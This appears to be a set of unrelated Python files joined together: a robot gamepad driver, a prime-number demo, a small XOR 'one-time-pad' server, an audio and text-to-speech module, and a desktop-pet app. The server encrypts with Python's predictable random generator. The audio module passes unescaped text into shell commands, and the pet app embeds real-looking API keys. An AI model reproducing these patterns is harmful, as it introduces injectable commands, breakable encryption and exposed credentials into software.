except Exception as e:
self._enabled = False
self._gamepad = None
raise GamepadConnectException('unable to connect to input device path {}: {}'.format(self._device_path, e))
# ..........................................................................
def enable(self):
if not self._closed:
self._log.info('enabled gamepad.')
if not self.in_loop():
self._enabled = True
self._start_gamepad_loop()
else:
self._log.error('cannot start gamepad.')
self._enabled = False
else:
self._log.warning('cannot enable gamepad: already closed.')
self._enabled = False
# ..........................................................................
def in_loop(self):
'''
Returns true if the main loop is active (the thread is alive).
'''
return self._thread != None and self._thread.is_alive()
# ......................................................
@staticmethod
def convert_range(value):
return ( (value - 127.0) / 255.0 ) * -2.0
# ..........................................................................
def _gamepad_loop(self, f_is_enabled):
self._log.info('starting event loop...')
__enabled = True
while __enabled and f_is_enabled():
try:
if self._gamepad is None:
raise Exception(Gamepad._NOT_AVAILABLE_ERROR + ' [gamepad no longer available]')
# loop and filter by event code and print the mapped label
for event in self._gamepad.read_loop():
self._handleEvent(event)
if not f_is_enabled():
self._log.info(Fore.BLACK + 'breaking from event loop.')
break
except Exception as e:
self._log.error('gamepad device error: {}'.format(e))
except OSError as e:
self._log.error(Gamepad._NOT_AVAILABLE_ERROR + ' [lost connection to gamepad]')
finally:
'''
Note that closing the InputDevice is a bit tricky, and we're currently
masking an exception that's always thrown. As there is no data loss on
a gamepad event loop being closed suddenly this is not an issue.
'''
try:
self._log.info('closing gamepad device...')
self._gamepad.close()
self._log.info(Fore.YELLOW + 'gamepad device closed.')
except Exception as e:
self._log.debug('error closing gamepad device: {}'.format(e))
finally:
__enabled = False
self._gamepad_closed = True
self._rate.wait()
self._log.info('exited event loop.')
# ..........................................................................
@property
def enabled(self):
return self._enabled
# ..........................................................................
def _start_gamepad_loop(self):
'''
This is the method to call to actually start the loop.
'''
if not self._enabled:
self._log.error('attempt to start gamepad event loop while disabled.')
elif self._gamepad is None:
self._log.error(Gamepad._NOT_AVAILABLE_ERROR + ' [no gamepad found]')
sys.exit(3)
elif not self._closed:
if self._thread is None:
self._enabled = True
self._thread = Thread(name='gamepad', target=Gamepad._gamepad_loop, args=[self, lambda: self._enabled], daemon=True)
# self._thread.setDaemon(False)
self._thread.start()
self._log.info('started.')
else:
self._log.warning('cannot enable: process already running.')
else:
self._log.warning('cannot enable: already closed.')
# ..........................................................................
def disable(self):
if self._closed:
self._log.warning('can\'t disable: already closed.')
elif not self._enabled:
self._log.debug('already disabled.')
else:
self._enabled = False
# we'll wait a bit for the gamepad device to close...
time.sleep(2.0)
# _i = 0
# while not self._gamepad_closed and _i < 20:
# _i += 1
# self._log.debug('_i: {:d}'.format(_i))
# time.sleep(0.1)
self._log.info('disabled.')
# ..........................................................................
def close(self):
'''
Permanently close and disable the gamepad.
'''
if self._enabled:
self.disable()
if not self._closed:
self._closed = True
self._log.info('closed.')
else:
self._log.debug('already closed.')
# ..........................................................................
def _handleEvent(self, event):
'''
Handles the incoming event by filtering on event type and code.
There's possibly a more elegant way of doing this but for now this
works just fine.
'''
_message = None
_control = None
if event.type == ecodes.EV_KEY:
_control = GamepadControl.get_by_code(self, event.code)
if event.value == 1:
if event.code == GamepadControl.A_BUTTON.code:
self._log.info(Fore.RED + "A Button")
# _control = GamepadControl.A_BUTTON
elif event.code == GamepadControl.B_BUTTON.code:
self._log.info(Fore.RED + "B Button")
# _control = GamepadControl.B_BUTTON
elif event.code == GamepadControl.X_BUTTON.code:
self._log.info(Fore.RED + "X Button")
# _control = GamepadControl.X_BUTTON
elif event.code == GamepadControl.Y_BUTTON.code:
self._log.info(Fore.RED + "Y Button")
# _control = GamepadControl.Y_BUTTON
elif event.code == GamepadControl.L1_BUTTON.code:
self._log.info(Fore.YELLOW + "L1 Button")
# _control = GamepadControl.L1_BUTTON
elif event.code == GamepadControl.L2_BUTTON.code:
self._log.info(Fore.YELLOW + "L2 Button")
# _control = GamepadControl.L2_BUTTON
elif event.code == GamepadControl.R1_BUTTON.code:
self._log.info(Fore.YELLOW + "R1 Button")
# _control = GamepadControl.R1_BUTTON
elif event.code == GamepadControl.R2_BUTTON.code:
self._log.info(Fore.YELLOW + "R2 Button")
# _control = GamepadControl.R2_BUTTON
elif event.code == GamepadControl.START_BUTTON.code:
self._log.info(Fore.GREEN + "Start Button")
# _control = GamepadControl.START_BUTTON
elif event.code == GamepadControl.SELECT_BUTTON.code:
self._log.info(Fore.GREEN + "Select Button")
# _control = GamepadControl.SELECT_BUTTON
elif event.code == GamepadControl.HOME_BUTTON.code:
self._log.info(Fore.MAGENTA + "Home Button")
# _control = GamepadControl.HOME_BUTTON
else:
self._log.info(Fore.BLACK + "event type: EV_KEY; event: {}; value: {}".format(event.code, event.value))
else:
# self._log.info(Fore.BLACK + Style.DIM + "event type: EV_KEY; value: {}".format(event.value))
pass
elif event.type == ecodes.EV_ABS:
_control = GamepadControl.get_by_code(self, event.code)
if event.code == GamepadControl.DPAD_HORIZONTAL.code:
if event.value == 1:
self._log.info(Fore.CYAN + Style.BRIGHT + "D-Pad Horizontal(Right) {}".format(event.value))
elif event.value == -1:
self._log.info(Fore.CYAN + Style.NORMAL + "D-Pad Horizontal(Left) {}".format(event.value))
else:
self._log.info(Fore.BLACK + "D-Pad Horizontal(N) {}".format(event.value))
elif event.code == GamepadControl.DPAD_VERTICAL.code:
if event.value == -1:
self._log.info(Fore.CYAN + Style.NORMAL + "D-Pad Vertical(Up) {}".format(event.value))
elif event.value == 1:
self._log.info(Fore.CYAN + Style.BRIGHT + "D-Pad Vertical(Down) {}".format(event.value))
else:
self._log.info(Fore.BLACK + "D-Pad Vertical(N) {}".format(event.value))
elif event.code == GamepadControl.L3_VERTICAL.code:
self._log.debug(Fore.MAGENTA + "L3 Vertical {}".format(event.value))
elif event.code == GamepadControl.L3_HORIZONTAL.code:
self._log.debug(Fore.YELLOW + "L3 Horizontal {}".format(event.value))
elif event.code == GamepadControl.R3_VERTICAL.code:
self._log.debug(Fore.GREEN + "R3 Vertical {}".format(event.value))
# _control = GamepadControl.R3_VERTICAL
elif event.code == GamepadControl.R3_HORIZONTAL.code:
self._log.debug(Fore.GREEN + "R3 Horizontal {}".format(event.value))
# _control = GamepadControl.R3_HORIZONTAL
else:
# self._log.info(Fore.BLACK + "type: EV_ABS; event code: {}; value: {}".format(event.code, event.value))
pass
else:
# self._log.info(Fore.BLACK + Style.DIM + "ZZ. event type: {}; code: {}; value: {}".format(event.type, event.code, event.value))
pass
if _control != None:
_message = self._message_factory.get_message(_control.event, event.value)
self._log.debug(Fore.CYAN + Style.BRIGHT + "triggered control with message {}".format(_message))
self._message_bus.add(_message)
# ..............................................................................
class GamepadControl(Enum):
'''
An enumeration of the controls available on the 8BitDo N30 Pro Gamepad,
or any similar/compatible model. The numeric values for 'code' may need
to be modified for different devices, but the basic functionality of this
Enum should hold.
This also includes an Event variable, which provides the mapping between
a specific gamepad control and its corresponding action.
The @property annotations make sure the respective variable is read-only.
control num code id control descripton event
'''
A_BUTTON = ( 1, 304, 'cross', 'A (Cross) Button', Event.SNIFF)
B_BUTTON = ( 2, 305, 'circle', 'B (Circle) Button', Event.STOP)
X_BUTTON = ( 3, 307, 'triangle', 'X (Triangle) Button', Event.ROAM)
Y_BUTTON = ( 4, 308, 'square', 'Y ((Square) Button', Event.BRAKE)
L1_BUTTON = ( 5, 310, 'l1', 'L1 Video', Event.VIDEO)
L2_BUTTON = ( 6, 312, 'l2', 'L2 Event', Event.EVENT_L2) # unassigned
R1_BUTTON = ( 8, 311, 'r1', 'R1 Lights On', Event.EVENT_R1) # unassigned
R2_BUTTON = ( 7, 313, 'r2', 'R2 Lights Off', Event.LIGHTS)
# L1_BUTTON = ( 5, 310, 'l1', 'L1 Button', Event.BUMPER_PORT)
# L2_BUTTON = ( 6, 312, 'l2', 'L2 Button', Event.BUMPER_CNTR)
# R2_BUTTON = ( 7, 313, 'r2', 'R2 Button', Event.BUMPER_CNTR)
# R1_BUTTON = ( 8, 311, 'r1', 'R1 Button', Event.BUMPER_STBD)
START_BUTTON = ( 9, 315, 'start', 'Start Button', Event.NO_ACTION)
SELECT_BUTTON = ( 10, 314, 'select', 'Select Button', Event.STANDBY)
HOME_BUTTON = ( 11, 306, 'home', 'Home Button', Event.SHUTDOWN)
DPAD_HORIZONTAL = ( 12, 16, 'dph', 'D-PAD Horizontal', Event.THETA)
DPAD_VERTICAL = ( 13, 17, 'dpv', 'D-PAD Vertical', Event.FORWARD_VELOCITY)
L3_VERTICAL = ( 14, 1, 'l3v', 'L3 Vertical', Event.PORT_VELOCITY)
L3_HORIZONTAL = ( 15, 0, 'l3h', 'L3 Horizontal', Event.PORT_THETA)
R3_VERTICAL = ( 16, 5, 'r3v', 'R3 Vertical', Event.STBD_VELOCITY)
R3_HORIZONTAL = ( 17, 2, 'r3h', 'R3 Horizontal', Event.STBD_THETA)
# ignore the first param since it's already set by __new__
def __init__(self, num, code, name, label, event):
self._code = code
self._name = name
self._label = label
self._event = event
@property
def code(self):
return self._code
@property
def name(self):
return self._name
@property
def label(self):
return self._label
@property
def event(self):
return self._event
# ..........................................................................
@staticmethod
def get_by_code(self, code):
for ctrl in GamepadControl:
if ctrl.code == code:
# print(Fore.WHITE + Style.BRIGHT + 'ctrl code: {}'.format(code) + Style.RESET_ALL)
return ctrl
return None
# ..............................................................................
class GamepadScan(object):
'''
Returns the device with the most recently changed status from /dev/input/event{n}
This can help you figure out which device is your gamepad, if if was connected
after everything else in the system had settled.
'''
def __init__(self, config, level):
self._log = Logger("gamepad-scan", level)
if config is None:
raise ValueError("no configuration provided.")
_config = config['ros'].get('gamepad')
self._device_path = _config.get('device_path')
self._log.debug('device path: {}'.format(self._device_path))
self._log.info('ready')
# ..........................................................................
def _get_ctime(self, path):
try:
_device_stat = os.stat(path)
return _device_stat.st_ctime
except OSError:
return -1.0
# ..........................................................................
def get_latest_device(self):
'''
Build a dictionary of available devices, return the one with the
most recent status change.
'''
_dict = {}
for i in range(10):
_path = '/dev/input/event{}'.format(i)
try:
_device_stat = os.stat(_path)
_ctime = _device_stat.st_ctime
except OSError:
break
self._log.debug('device: {}'.format(_path) + Fore.BLUE + Style.NORMAL + '\tstatus changed: {}'.format(dt.datetime.fromtimestamp(_ctime)))
_dict[_path] = _ctime
# find most recent by sorting the dictionary on ctime
_sorted = sorted(_dict.items(), key=lambda x:x[1])
_latest_devices = _sorted[len(_sorted)-1]
_latest_device = _latest_devices[0]
self._log.info('device path: {}'.format(self._device_path))
self._log.info('most recent device: {}'.format(_latest_device))
return _latest_device
# ..........................................................................
def check_gamepad_device(self):
'''
Checks that the configured device matches the device with the most
recently changed status, returning True if matched.
'''
_latest_device = self.get_latest_device()
if self._device_path == _latest_device:
self._log.info(Style.BRIGHT + 'matches: {}'.format(self._device_path))
return True
else:
self._log.info(Style.BRIGHT + 'does not match: {}'.format(_latest_device))
return False
# ..............................................................................
class GamepadConnectException(Exception):
'''
Exception raised when unable to connect to Gamepad.
'''
pass
# EOF
|
primes.py
|
import time
from Queue import Queue
from threading import Thread
from random import normalvariate
import collectd
numbers = Queue()
conn = collectd.Connection()
def is_prime(n):
for i in xrange(2, n):
if n % i == 0:
return False
return True
def watch_queue():
while True:
conn.queue.set_exact(size = numbers.qsize())
time.sleep(1)
def consumer():
while True:
n = numbers.get()
before = time.time()
primality = is_prime(n)
elapsed = time.time() - before
if primality:
print n, "is prime"
conn.consumer.record("prime", count = 1, time = elapsed)
else:
print n, "is not prime"
conn.consumer.record("composite", count = 1, time = elapsed)
def producer():
while True:
n = int((time.time() % 30) ** normalvariate(5, 2))
if n < 2:
conn.producer.record(too_small = 1)
elif n > 10 ** 9:
conn.producer.record(too_big = 1)
else:
conn.producer.record(just_right = 1)
numbers.put(n)
time.sleep(0.33)
if __name__ == "__main__":
collectd.start_threads()
for func in [producer, consumer]:
t = Thread(target = func)
t.daemon = True
t.start()
watch_queue()
|
one-time-pad.py
|
#!/usr/bin/env python3
# vim: set fenc=utf8 ts=4 sw=4 et :
import sys
import socket
import random
from threading import Thread
with open("key.png", "rb") as f:
SECRET = f.read()
def client_thread(clientsocket):
clientsocket.send(bytes([
SECRET[i] ^ random.getrandbits(8)
for i in range(len(SECRET))
]))
clientsocket.close()
def main():
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind((socket.gethostname(), 8889))
serversocket.listen()
print('len(SECRET) = {} Bytes'.format(len(SECRET)))
sys.stdout.flush()
while True:
# accept connections on socket
(clientsocket, address) = serversocket.accept()
print('Client connected {}'.format(address))
sys.stdout.flush()
thread = Thread(target = client_thread, args = (clientsocket, ))
thread.start()
if __name__ == "__main__":
main()
|
__init__.py
|
#
# Copyright (c) 2014, Scott Silver Labs, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
This module provides interfaces to the Ready Set STEM CREATOR Kit speaker.
Additionally, it can be used for any audio out over the analog audio jack.
'''
import os
import sys
import time
import re
import io
import select
from functools import partial
from . import soundutil # c extension
import tempfile
from threading import RLock, Thread, Condition, Event
from queue import Queue, Full, Empty
from subprocess import call, check_output
from struct import pack, unpack
import socket
'''
Future Sound class member function:
def seek(self, position, absolute=False, percentage=False)
- relative +/- seconds
- absolute +/- seconds (-negative seconds from end)
- absolute percentage
- returns previous position, in seconds
'''
STOP, PLAY, FLUSH, STOPPING = range(4)
CHUNK_BYTES = 1024
SOUND_CACHE = '/home/pi/.rstem_sounds'
SOUND_DIR = '/opt/readysetstem/sounds'
MIXER_EXE_BASENAME = 'rstem_mixer'
MIXER_EXE_DIRNAME = '/opt/readysetstem/bin'
MIXER_EXE = os.path.join(MIXER_EXE_DIRNAME, MIXER_EXE_BASENAME)
SERVER_PORT = 8888
def shell_cmd(cmd):
with open(os.devnull, "w") as devnull:
call(cmd, stdout=devnull, stderr=devnull, shell=True)
def start_server():
# start server (if it is not already running)
shell_cmd('pgrep -c {} || {} &'.format(MIXER_EXE_BASENAME, MIXER_EXE))
# Force audio to always come out of the analog audio jack. Some HDMI
# monitors will cause the audio auto detect to set sound out of HDMI even
# the connected monitor has no sound (or disabled sound)
shell_cmd('amixer cset numid=3 1')
# Wait until server is up
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for tries in range(30):
try:
sock.connect(("localhost", SERVER_PORT))
except socket.error:
pass
else:
sock.close()
break
time.sleep(0.1)
def sound_dir():
return SOUND_DIR
def master_volume(level):
if level < 0 or level > 100:
raise ValueError("level must be between 0 and 100.")
shell_cmd('amixer sset PCM {}%'.format(int(level)))
def clean_close(sock):
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
try:
sock.close()
except socket.error:
pass
class BaseSound(object):
# Default master volume
master_volume(100)
start_server()
def __init__(self):
self._SAMPLE_RATE = 44100
self._BYTES_PER_SAMPLE = 2
self._CHANNELS = 1
self._length = 0
self.gain = 1
self.internal_gain = 1
self.start_time = None
self.stop_play_mutex = RLock()
self.stopped = Event()
self.stopped.set()
# Create play msg queue, with added member function that allows a
# get_nowait() that can return empty if nothing is available.
self.play_msg = Queue()
def get_nowait_noempty():
try:
return self.play_msg.get_nowait()
except Empty:
return (None, None)
self.play_msg.get_nowait_noempty = get_nowait_noempty
self.play_count = 0
self.play_thread = Thread(target=self.__play_thread)
self.play_thread.daemon = True
self.play_thread.start()
def length(self):
'''Returns the length of the sound in seconds'''
return self._length
def is_playing(self):
'''Returns `True` if the sound is currently playing'''
return not self.stopped.is_set()
def wait(self, timeout=None):
'''Wait until the sound has finished playing.
If timeout is given (seconds), will return early (after the timeout
time) even if the sound is not finished playing.
Returns itself, so this function can be chained.
'''
assert self.play_thread.is_alive()
self.stopped.wait(timeout)
return self
def stop(self):
'''Immediately stop the sound from playing.
Does nothing if the sound is not currently playing.
Returns itself, so this function can be chained.
'''
assert self.play_thread.is_alive()
with self.stop_play_mutex:
self.play_msg.put((STOP, None))
self.wait()
return self
def play(self, loops=1, duration=None):
'''Starts playing the sound.
This function starts playing the sound, and returns immediately - the
sound plays in the background. To wait for the sound, use `wait()`.
Because sound functions can be chained, to create, play and wait for a
sound to complete can be done in one compound command. For example:
Sound('mysound.wav').play().wait()
`loops` is the number of times the sound should be played. `duration`
is the length of the sound to play (or `None` to play forever, or until
the sound ends).
Returns itself, so this function can be chained.
'''
assert self.play_thread.is_alive()
if duration and duration < 0:
raise ValueError("duration must be a positive number")
with self.stop_play_mutex:
self.stop()
self.end_time = time.time()
previous_play_count = self.play_count
self.play_msg.put((PLAY, (loops, duration)))
# Wait until we know the play has started (i.e., the state ===
# PLAY). Ugly (polled), but simple.
while previous_play_count == self.play_count:
time.sleep(0.001)
return self
def __play_thread(self):
state = STOP
while True:
if state == STOP:
msg, payload = self.play_msg.get()
if msg == PLAY:
self.stopped.clear()
self.play_count += 1
loops, duration = payload
chunk = self._chunker(loops, duration)
count = 0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", SERVER_PORT))
state = PLAY
elif state == PLAY:
msg, payload = self.play_msg.get_nowait_noempty()
if msg == STOP:
state = STOPPING
else:
try:
try:
header = pack('if', count, self.gain)
sock.send(header + next(chunk))
count += 1
except StopIteration:
header = pack('if', -1, 0)
sock.send(header)
state = FLUSH
readable, writable, exceptional = select.select([sock], [], [sock], 0)
if readable:
c = sock.recv(1)
eof = not c or ord(c)
if eof:
state = FLUSH
if exceptional:
state = FLUSH
except socket.error:
state = STOPPING
# Throttle
time.sleep(0.005)
elif state == FLUSH:
msg, payload = self.play_msg.get_nowait_noempty()
if msg == STOP:
state = STOPPING
else:
# Server will play sound to end and close socket.
eof_ack = sock.recv(1)
if not eof_ack:
state = STOPPING
# Throttle
time.sleep(0.005)
elif state == STOPPING:
clean_close(sock)
self.stopped.set()
state = STOP
def _time_to_bytes(self, duration):
if duration == None:
return None
samples = duration * self._SAMPLE_RATE
return samples * self._BYTES_PER_SAMPLE
@property
def volume(self):
'''The volume of the sound object
Each sound object has an volume (independent of the `master_volume()`),
between 0 (muted) and 100 (loudest).
The volume is readable/writeable.
'''
return round(self.gain * self.internal_gain * 100)
@volume.setter
def volume(self, level):
if level < 0:
raise ValueError("level must be a positive number")
self.gain = (level/100)/self.internal_gain
# dummy chunking function
def _chunker(self, loops, duration):
return bytes(CHUNK_BYTES)
class Sound(BaseSound):
'''
A Sound object, that plays sounds read in from sound files.
In addition to the Sound object, this module provides some useful global
functions:
master_volume(level):
Sets the master volume (between 0 and 100)
of the audio out.
sound_dir():
Returns the sounds dir, where all sound
files are stored.
'''
def __init__(self, filename):
'''A playable sound backed by the sound file `filename` on disk.
Throws `IOError` if the sound file cannot be read.
'''
super().__init__()
self.bytes = None
if isinstance(filename, bytes):
data = filename
self.file_opener = partial(io.BytesIO, data)
byte_length = len(data)
else:
# normalize path, raltive to SOUND_DIR
try:
filename = os.path.normpath(os.path.join(SOUND_DIR, filename))
except:
raise ValueError("Filename '{}' is not valid".format(filename))
# Is it a file? Not a definitive test here, but used as a courtesy to
# give a better error when the filename is wrong.
if not os.path.isfile(filename):
raise IOError("Sound file '{}' cannot be found".format(filename))
# Create cached file
if not os.path.isdir(SOUND_CACHE):
os.makedirs(SOUND_CACHE)
_, file_ext = os.path.splitext(filename)
if file_ext != '.raw':
# Use sox to convert sound file to raw cached sound
elongated_file_name = re.sub('/', '_', filename)
raw_name = os.path.join(SOUND_CACHE, elongated_file_name)
# If cached file doesn't exist, create it using sox
if not os.path.isfile(raw_name):
soxcmd = 'sox -q {} -L -r44100 -b16 -c1 -traw {}'.format(filename, raw_name)
shell_cmd(soxcmd)
# test error
filename = raw_name
self.file_opener = partial(open, filename, 'rb')
byte_length = os.path.getsize(filename)
self._length = round(byte_length / (self._SAMPLE_RATE * self._BYTES_PER_SAMPLE), 6)
def _chunker(self, loops, duration):
with self.file_opener() as f:
duration_bytes = self._time_to_bytes(duration)
leftover = b''
for loop in reversed(range(loops)):
f.seek(0)
bytes_written = 0
while duration_bytes == None or bytes_written < duration_bytes:
if leftover:
chunk = leftover + f.read(CHUNK_BYTES - len(leftover))
leftover = b''
else:
chunk = f.read(CHUNK_BYTES)
if chunk:
if len(chunk) < CHUNK_BYTES and loop > 0:
# Save partial chunk as leftovers
leftover = chunk
break
else:
# Pad silence, if we're on the last loop and it's not a full chunk
if loop == 0:
chunk = chunk + bytes(CHUNK_BYTES)[len(chunk):]
bytes_written += CHUNK_BYTES
yield chunk
else:
# EOF
break
class Note(BaseSound):
'''A sine wave sound object. '''
def __init__(self, pitch):
'''Create a sound object that is a sine wave of the given `pitch`.
`pitch` can either be a number that is the frequency Hz (for example
440 or 256.7), or it can be a string which represents the musical note.
As a string, it should be 1 to 3 characters, of the form:
NSO
where
1. N is the note (required), from A to G
1. S is an optional semitone, either '#' (sharp) or 'b' (flat)
1. O is the optional octave, default octave is 4.
A 440Hz 'A' could be represented by any of the following:
- 440
- 'A'
- 'A4'
For example, a ascending/descending chromatic scale on C could be
represented by:
ascending = \\
['C', 'C#', 'D', 'D#', 'E', 'F', 'F#',
'G', 'G#', 'A5', 'A#5', 'B5', 'C5']
descending = \\
['C5', 'B5', 'Bb5', 'A5', 'Ab5', 'G',
'Gb', 'F', 'E', 'Eb', 'D', 'Db', 'C']
Also note, semitones are extact halftones, so for example 'C#' is
identical to 'Db'.
'''
super().__init__()
A4_frequency = 440
A6_frequency = A4_frequency * 2 * 2
try:
self.frequency = float(pitch)
except ValueError:
match = re.search('^([A-G])([b#]?)([0-9]?)$', pitch)
if not match:
raise ValueError("pitch parameter must be a frequency or note (e.g. 'A', 'B#', or 'Cb4')")
note, semitone, octave = match.groups()
if not semitone:
semitone_adjust = 0
elif semitone == 'b':
semitone_adjust = -1
else:
semitone_adjust = 1
if not octave:
octave = 4
octave = int(octave)
half_step_map = {'C' : 0, 'D' : 2, 'E' : 4, 'F' : 5, 'G' : 7, 'A' : 9, 'B' : 11}
half_steps = octave * 12 + half_step_map[note]
half_steps += semitone_adjust
# Adjust half steps relative to A4 440Hz
half_steps -= 4 * 12 + 9
self.frequency = 2 ** (half_steps / 12.0) * A4_frequency
# Simple bass boost: scale up the volume of lower frequency notes. For
# each octave below a 'A6', double the volume
if self.frequency < A6_frequency:
self.internal_gain = A6_frequency / self.frequency
def play(self, duration=1):
'''Starts playing the Note.
This function starts playing the sound, and returns immediately - the
sound plays in the background. To wait for the sound, use `wait()`.
Because sound functions can be chained, to create, play and wait for a
sound to complete can be done in one compound command. For example:
Note('A').play().wait()
Returns itself, so this function can be chained.
'''
super().play(duration=duration)
return self
def _chunker(self, loops, duration):
if duration == None:
chunks = 999999999
else:
chunks = int((self._time_to_bytes(duration) * loops) / CHUNK_BYTES)
for chunk in range(chunks):
yield soundutil.note(chunk, float(self.frequency))
class Speech(Sound):
'''A text-to-speech sound object.'''
def __init__(self, text, espeak_options=''):
'''Create a sound object that is text-to-speech of the given `text`.
The sound is created using the espeak engine (an external program).
Command line options to espeak can be added using `espeak_options`.
'''
wav_fd, wav_name = tempfile.mkstemp(suffix='.wav')
os.system('espeak {} -w {} "{}"'.format(espeak_options, wav_name, text))
os.close(wav_fd)
self.wav_name = wav_name
super().__init__(wav_name)
def __del__(self):
os.remove(self.wav_name)
__all__ = ['Sound', 'Note', 'Speech', 'master_volume' 'sound_dir']
|
desktoppet.py
|
'''
Function:
桌面宠物
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
import os
import sys
import time
import random
import requests
import threading
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import QtWidgets, QtGui
'''配置信息'''
class Config():
ROOT_DIR = os.path.join(os.path.split(os.path.abspath(__file__))[0], 'resources')
ACTION_DISTRIBUTION = [
['1', '2', '3'],
['4', '5', '6', '7', '8', '9', '10', '11'],
['12', '13', '14'],
['15', '16', '17'],
['18', '19'],
['20', '21'],
['22'],
['23', '24', '25'],
['26', '27', '28', '29'],
['30', '31', '32', '33'],
['34', '35', '36', '37'],
['38', '39', '40', '41'],
['42', '43', '44', '45', '46']
]
PET_ACTIONS_MAP = dict()
for name in ['pikachu', 'blackcat', 'whitecat', 'fox']:
PET_ACTIONS_MAP[name] = ACTION_DISTRIBUTION
PET_ACTIONS_MAP['bingdwendwen'] = [
[str(i) for i in range(1, 41, 8)],
[str(i) for i in range(41, 56)],
[str(i) for i in range(56, 91)],
]
BAIDU_KEYS = random.choice([
['25419425', 'fct6UMiQMLsp53MqXzp7AbKQ', 'p3wU9nPnfR7iBz2kM25sikN2ms0y84T3'],
['24941009', '2c5AnnNaQKOIcTrLDTuY41vv', 'HOYo7BunbFtt88Z0ALFZcFSQ4ZVyIgiZ'],
['11403041', 'swB03t9EbokK03htGsg0PKYe', 'XX20l47se2tSGmet8NihkHQLIjTIHUyy'],
])
'''语音识别模块'''
class SpeechRecognition():
def __init__(self, app_id, api_key, secret_key, **kwargs):
from aip import AipSpeech
self.aipspeech_api = AipSpeech(app_id, api_key, secret_key)
self.speech_path = kwargs.get('speech_path', 'recording.wav')
assert self.speech_path.endswith('.wav'), 'only support audio with wav format'
'''录音'''
def record(self, sample_rate=16000):
import speech_recognition as sr
rec = sr.Recognizer()
with sr.Microphone(sample_rate=sample_rate) as source:
audio = rec.listen(source)
with open(self.speech_path, 'wb') as fp:
fp.write(audio.get_wav_data())
'''识别'''
def recognition(self):
try:
assert os.path.exists(self.speech_path)
with open(self.speech_path, 'rb') as fp:
content = fp.read()
result = self.aipspeech_api.asr(content, 'wav', 16000, {'dev_pid': 1536})
text = result['result'][0]
return text
except:
return None
'''合成并说话'''
def synthesisspeak(self, text=None, audiopath=None):
assert text is None or audiopath is None
import pygame
if audiopath is None:
audiopath = f'recording_{time.time()}.mp3'
result = self.aipspeech_api.synthesis(
text, 'zh', 1,
{'spd': 4, 'vol': 5, 'per': 4}
)
if not isinstance(result, dict):
with open(audiopath, 'wb') as fp:
fp.write(result)
pygame.mixer.init()
pygame.mixer.music.load(audiopath)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
time.sleep(0.5)
else:
pygame.mixer.init()
pygame.mixer.music.load(audiopath)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
time.sleep(0.5)
'''桌面宠物'''
class DesktopPet(QWidget):
tool_name = '桌面宠物'
def __init__(self, pet_type='pikachu', parent=None, **kwargs):
super(DesktopPet, self).__init__(parent)
self.pet_type = pet_type
self.cfg = Config()
for key, value in kwargs.items():
if hasattr(self.cfg, key): setattr(self.cfg, key, value)
app_id, api_key, secret_key = self.cfg.BAIDU_KEYS
self.speech_api = SpeechRecognition(app_id, api_key, secret_key)
# 初始化
self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint|Qt.SubWindow)
self.setAutoFillBackground(False)
self.setAttribute(Qt.WA_TranslucentBackground, True)
self.repaint()
# 导入宠物
if pet_type not in self.cfg.PET_ACTIONS_MAP: pet_type = None
if pet_type is None:
self.pet_images, iconpath = self.randomLoadPetImages()
else:
for name in list(self.cfg.PET_ACTIONS_MAP.keys()):
if name != pet_type: self.cfg.PET_ACTIONS_MAP.pop(name)
self.pet_images, iconpath = self.randomLoadPetImages()
# 设置退出选项
quit_action = QAction('退出', self, triggered=self.quit)
quit_action.setIcon(QIcon(iconpath))
self.tray_icon_menu = QMenu(self)
self.tray_icon_menu.addAction(quit_action)
self.tray_icon = QSystemTrayIcon(self)
self.tray_icon.setIcon(QIcon(iconpath))
self.tray_icon.setContextMenu(self.tray_icon_menu)
self.tray_icon.show()
# 当前显示的图片
self.image = QLabel(self)
self.setImage(self.pet_images[0][0])
# 是否跟随鼠标
self.is_follow_mouse = False
# 宠物拖拽时避免鼠标直接跳到左上角
self.mouse_drag_pos = self.pos()
# 显示
self.resize(self.pet_images[0][0].size().width(), self.pet_images[0][0].size().height())
self.randomPosition()
self.show()
# 宠物动画动作执行所需的一些变量
self.is_running_action = False
self.action_images = []
self.action_pointer = 0
self.action_max_len = 0
# 每隔一段时间做个动作
self.timer_act = QTimer()
self.timer_act.timeout.connect(self.randomAct)
self.timer_act.start(500)
# 每隔一段时间检测一次语音
self.timer_speech = QTimer()
self.timer_speech.timeout.connect(self.talk)
self.timer_speech.start(2000)
self.running_talk = False
'''对话功能实现'''
def talk(self):
if self.running_talk: return
self.running_talk = True
def _talk(self):
valid_names = {'pikachu': '皮卡丘', 'blackcat': '黑猫', 'whitecat': '白猫', 'fox': '狐狸', 'bingdwendwen': '冰墩墩'}
while True:
self.speech_api.record()
user_input = self.speech_api.recognition()
if user_input is None: return
if valid_names[self.pet_type] in user_input: break
else: return
self.speech_api.synthesisspeak('你好呀, 主人')
while True:
self.speech_api.record()
user_input = self.speech_api.recognition()
if user_input is None: continue
if '再见' in user_input:
self.speech_api.synthesisspeak('好的, 主人再见')
self.running_talk = False
break
else:
reply = self.turing(user_input)
self.speech_api.synthesisspeak(reply)
threading.Thread(target=lambda: _talk(self)).start()
'''图灵机器人API'''
def turing(self, inputs):
appkeys = [
'f0a5ab746c7d41c48a733cabff23fb6d', 'c4fae3a2f8394b73bcffdecbbb4c6ac6', '0ca694db371745668c28c6cb0a755587',
'7855ce1ebd654f31938505bb990616d4', '5945954988d24ed393f465aae9be71b9', '1a337b641da04c64aa7fd4849a5f713e',
'eb720a8970964f3f855d863d24406576', '1107d5601866433dba9599fac1bc0083', '70a315f07d324b3ea02cf21d13796605',
'45fa933f47bb45fb8e7746759ba9b24a', '2f1446eb0321804291b0a1e217c25bb5', '7f05e31d381143d9948109e75484d9d0',
